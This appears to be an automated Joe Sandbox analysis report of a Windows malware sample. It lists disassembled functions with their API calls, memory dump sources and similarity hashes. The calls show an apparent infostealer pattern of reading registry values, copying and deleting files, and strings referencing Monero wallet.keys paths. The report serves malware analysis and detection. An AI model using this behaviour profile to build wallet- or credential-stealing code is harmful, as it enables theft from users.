                                      • lstrlen.KERNEL32(00000000,?,00D39F71,00000000,0167E0C8), ref: 00D49437
                                      • wsprintfA.USER32 ref: 00D49457
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpynlstrlenwsprintf
                                      • String ID: %s%s
                                      • API String ID: 1206339513-3252725368
                                      • Opcode ID: 85e5cdd1f098f29eea39f803b8d16be85d7c435a31021d5ad808ac0567b3f228
                                      • Instruction ID: abb2861aa3fe080c917d242dc1c544c00d9fda7067c45f4b465ad04bc8b6d39b
                                      • Opcode Fuzzy Hash: 85e5cdd1f098f29eea39f803b8d16be85d7c435a31021d5ad808ac0567b3f228
                                      • Instruction Fuzzy Hash: 03011E75500108FFCB15DFA8C954EEE7B78EB48305F108248F98D9B285DA7AFA44DBA1
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00D312B4
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00D312BB
                                      • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00D312D7
                                      • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00D312F5
                                      • RegCloseKey.ADVAPI32(?), ref: 00D312FF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                      • String ID:
                                      • API String ID: 3225020163-0
                                      • Opcode ID: 3c317e9e8969a330a01ea9093845d9d516bde19a9a767dfcdfe5744d2fb6d038
                                      • Instruction ID: ce531c785f149f14b3cbe78343e75a0e2b51659bb2fef33142b413de8685bfc9
                                      • Opcode Fuzzy Hash: 3c317e9e8969a330a01ea9093845d9d516bde19a9a767dfcdfe5744d2fb6d038
                                      • Instruction Fuzzy Hash: F1013179A40209BFDB10DFD4DC49FAE777CEB48700F004194FA8597284D779AA008BA0
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: String___crt$Type
                                      • String ID:
                                      • API String ID: 2109742289-3916222277
                                      • Opcode ID: c4917df2dad6106649a393802ddf591618fc224c840294bf1bea69ff3aaa0103
                                      • Instruction ID: ba9a2724e3f7f90df1d40473cd80d6dccd1da185791b925308797f8a7858ef49
                                      • Opcode Fuzzy Hash: c4917df2dad6106649a393802ddf591618fc224c840294bf1bea69ff3aaa0103
                                      • Instruction Fuzzy Hash: 1341E4B05107989FDB218B288CC5FFB7BE99B45704F1844E8E9CA96182E2719A449F70
                                      APIs
                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00D46903
                                        • Part of subcall function 00D4AA50: lstrcpy.KERNEL32(00D50E1A,00000000), ref: 00D4AA98
                                        • Part of subcall function 00D4ACC0: lstrlen.KERNEL32(?,01678F98,?,\Monero\wallet.keys,00D50E1A), ref: 00D4ACD5
                                        • Part of subcall function 00D4ACC0: lstrcpy.KERNEL32(00000000), ref: 00D4AD14
                                        • Part of subcall function 00D4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AD22
                                        • Part of subcall function 00D4ABB0: lstrcpy.KERNEL32(?,00D50E1A), ref: 00D4AC15
                                      • ShellExecuteEx.SHELL32(0000003C), ref: 00D469C6
                                      • ExitProcess.KERNEL32 ref: 00D469F5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                      • String ID: <
                                      • API String ID: 1148417306-4251816714
                                      • Opcode ID: 08d96febb33d8023615361c99ad6ec34ada8cf71a21a389e20f9be587c4ed7f9
                                      • Instruction ID: 26359791b3c054a8713c7270d319c9fc0fe9c05ca3f9ddcd9dff3421dead8154
                                      • Opcode Fuzzy Hash: 08d96febb33d8023615361c99ad6ec34ada8cf71a21a389e20f9be587c4ed7f9
                                      • Instruction Fuzzy Hash: BE3136B1901218ABEB15EBA4DC96FDEB778EF48300F404189F20966181DF796A48CF79
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00D50E10,00000000,?), ref: 00D489BF
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00D489C6
                                      • wsprintfA.USER32 ref: 00D489E0
                                        • Part of subcall function 00D4AA50: lstrcpy.KERNEL32(00D50E1A,00000000), ref: 00D4AA98
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateProcesslstrcpywsprintf
                                      • String ID: %dx%d
                                      • API String ID: 1695172769-2206825331
                                      • Opcode ID: f3ce450940570bb86d2856c9bd5c5970944c652172014a9eaa9846bf63f92c71
                                      • Instruction ID: c8bd62ea2de9d8efa498d83682c209307acba2d050741e312ae62d6687c94114
                                      • Opcode Fuzzy Hash: f3ce450940570bb86d2856c9bd5c5970944c652172014a9eaa9846bf63f92c71
                                      • Instruction Fuzzy Hash: 88213DB1A44204AFDB25DF98DD45FAEBBB8FB48711F104119FA55A7284C77AA900CBB0
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00D496AE,00000000), ref: 00D48EEB
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00D48EF2
                                      • wsprintfW.USER32 ref: 00D48F08
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateProcesswsprintf
                                      • String ID: %hs
                                      • API String ID: 769748085-2783943728
                                      • Opcode ID: 8b3bf3de4fe85a53a9744fb1a7f7400afcda7b6c9e8ecab3f49cf42a33a9020c
                                      • Instruction ID: 518542c2bc157c9672dc308b53a7186d9fa74939a92d87a27637f49f8bdbbc44
                                      • Opcode Fuzzy Hash: 8b3bf3de4fe85a53a9744fb1a7f7400afcda7b6c9e8ecab3f49cf42a33a9020c
                                      • Instruction Fuzzy Hash: 7DE0EC75A44309BFDB21DB94DD0AE6D7BB8EB05702F000194FD8997380DA7AAE109BA1
                                      APIs
                                        • Part of subcall function 00D4AA50: lstrcpy.KERNEL32(00D50E1A,00000000), ref: 00D4AA98
                                        • Part of subcall function 00D4ACC0: lstrlen.KERNEL32(?,01678F98,?,\Monero\wallet.keys,00D50E1A), ref: 00D4ACD5
                                        • Part of subcall function 00D4ACC0: lstrcpy.KERNEL32(00000000), ref: 00D4AD14
                                        • Part of subcall function 00D4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AD22
                                        • Part of subcall function 00D4ABB0: lstrcpy.KERNEL32(?,00D50E1A), ref: 00D4AC15
                                        • Part of subcall function 00D48CF0: GetSystemTime.KERNEL32(00D50E1B,0167A270,00D505B6,?,?,00D313F9,?,0000001A,00D50E1B,00000000,?,01678F98,?,\Monero\wallet.keys,00D50E1A), ref: 00D48D16
                                        • Part of subcall function 00D4AC30: lstrcpy.KERNEL32(00000000,?), ref: 00D4AC82
                                        • Part of subcall function 00D4AC30: lstrcat.KERNEL32(00000000), ref: 00D4AC92
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00D3AA11
                                      • lstrlen.KERNEL32(00000000,00000000), ref: 00D3AB2F
                                      • lstrlen.KERNEL32(00000000), ref: 00D3ADEC
                                        • Part of subcall function 00D4AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00D4AAF6
                                      • DeleteFileA.KERNEL32(00000000), ref: 00D3AE73
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                      • String ID:
                                      • API String ID: 211194620-0
                                      • Opcode ID: 544f4f250235a2db49a6444e92ab9cdd8a7661379b79ca212598aae891b02cdf
                                      • Instruction ID: 22b38f68e90a9974c668bfbcb0e5a754c6e0c1662939a27e96f6fb2a52e193d6
                                      • Opcode Fuzzy Hash: 544f4f250235a2db49a6444e92ab9cdd8a7661379b79ca212598aae891b02cdf
                                      • Instruction Fuzzy Hash: 66E11A729501189BEB15FBA8DCA2EEE7339EF14300F408599F51672091EF356A4CCB72
                                      APIs
                                        • Part of subcall function 00D4AA50: lstrcpy.KERNEL32(00D50E1A,00000000), ref: 00D4AA98
                                        • Part of subcall function 00D4ACC0: lstrlen.KERNEL32(?,01678F98,?,\Monero\wallet.keys,00D50E1A), ref: 00D4ACD5
                                        • Part of subcall function 00D4ACC0: lstrcpy.KERNEL32(00000000), ref: 00D4AD14
                                        • Part of subcall function 00D4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AD22
                                        • Part of subcall function 00D4ABB0: lstrcpy.KERNEL32(?,00D50E1A), ref: 00D4AC15
                                        • Part of subcall function 00D48CF0: GetSystemTime.KERNEL32(00D50E1B,0167A270,00D505B6,?,?,00D313F9,?,0000001A,00D50E1B,00000000,?,01678F98,?,\Monero\wallet.keys,00D50E1A), ref: 00D48D16
                                        • Part of subcall function 00D4AC30: lstrcpy.KERNEL32(00000000,?), ref: 00D4AC82
                                        • Part of subcall function 00D4AC30: lstrcat.KERNEL32(00000000), ref: 00D4AC92
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00D3D581
                                      • lstrlen.KERNEL32(00000000), ref: 00D3D798
                                      • lstrlen.KERNEL32(00000000), ref: 00D3D7AC
                                      • DeleteFileA.KERNEL32(00000000), ref: 00D3D82B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                      • String ID:
                                      • API String ID: 211194620-0
                                      • Opcode ID: 3e24be0bc1db61addcc820aec1a4685ecd973f55e6208dac94536329c4a39c8e
                                      • Instruction ID: c55e6c6bfb4bdff0f7c70200d0100168acfecf6ede92721f4aff2e2ec8b7911c
                                      • Opcode Fuzzy Hash: 3e24be0bc1db61addcc820aec1a4685ecd973f55e6208dac94536329c4a39c8e
                                      • Instruction Fuzzy Hash: A3910D729501189BDB15FFA8DCA2EEE7339EF54340F508569F51672091EF346A08CB72
                                      APIs
                                        • Part of subcall function 00D4AA50: lstrcpy.KERNEL32(00D50E1A,00000000), ref: 00D4AA98
                                        • Part of subcall function 00D4ACC0: lstrlen.KERNEL32(?,01678F98,?,\Monero\wallet.keys,00D50E1A), ref: 00D4ACD5
                                        • Part of subcall function 00D4ACC0: lstrcpy.KERNEL32(00000000), ref: 00D4AD14
                                        • Part of subcall function 00D4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AD22
                                        • Part of subcall function 00D4ABB0: lstrcpy.KERNEL32(?,00D50E1A), ref: 00D4AC15
                                        • Part of subcall function 00D48CF0: GetSystemTime.KERNEL32(00D50E1B,0167A270,00D505B6,?,?,00D313F9,?,0000001A,00D50E1B,00000000,?,01678F98,?,\Monero\wallet.keys,00D50E1A), ref: 00D48D16
                                        • Part of subcall function 00D4AC30: lstrcpy.KERNEL32(00000000,?), ref: 00D4AC82
                                        • Part of subcall function 00D4AC30: lstrcat.KERNEL32(00000000), ref: 00D4AC92
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00D3D901
                                      • lstrlen.KERNEL32(00000000), ref: 00D3DA9F
                                      • lstrlen.KERNEL32(00000000), ref: 00D3DAB3
                                      • DeleteFileA.KERNEL32(00000000), ref: 00D3DB32
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                      • String ID:
                                      • API String ID: 211194620-0
                                      • Opcode ID: c44d8cf638d157fcfda2917dd2ab97a7502b983c6ebc788cc145874c8e2008ce
                                      • Instruction ID: 69b7ee1a96616536f01a8e9ed84c2a3f8085fc18c44a1776ab9b506cfc43836a
                                      • Opcode Fuzzy Hash: c44d8cf638d157fcfda2917dd2ab97a7502b983c6ebc788cc145874c8e2008ce
                                      • Instruction Fuzzy Hash: BD812D729501189BDF14FFA8DCA2EEE7339EF54340F404569F506A2092EF356A08CB72
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                       • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AdjustPointer
                                      • String ID:
                                      • API String ID: 1740715915-0
                                      • Opcode ID: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
                                      • Instruction ID: e125139a3a4cc496fa37a05f82a6f55edc1fceb5f0873a3e21f61909b3694e0f
                                      • Opcode Fuzzy Hash: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
                                      • Instruction Fuzzy Hash: 4A51E372501206EFEB259F94C841BBA7BA4FF02301F2841ADF90647591E731ED44DBB0
                                      APIs
                                      • LocalAlloc.KERNEL32(00000040,?), ref: 00D3A664
                                        • Part of subcall function 00D4AA50: lstrcpy.KERNEL32(00D50E1A,00000000), ref: 00D4AA98
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                       • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmp
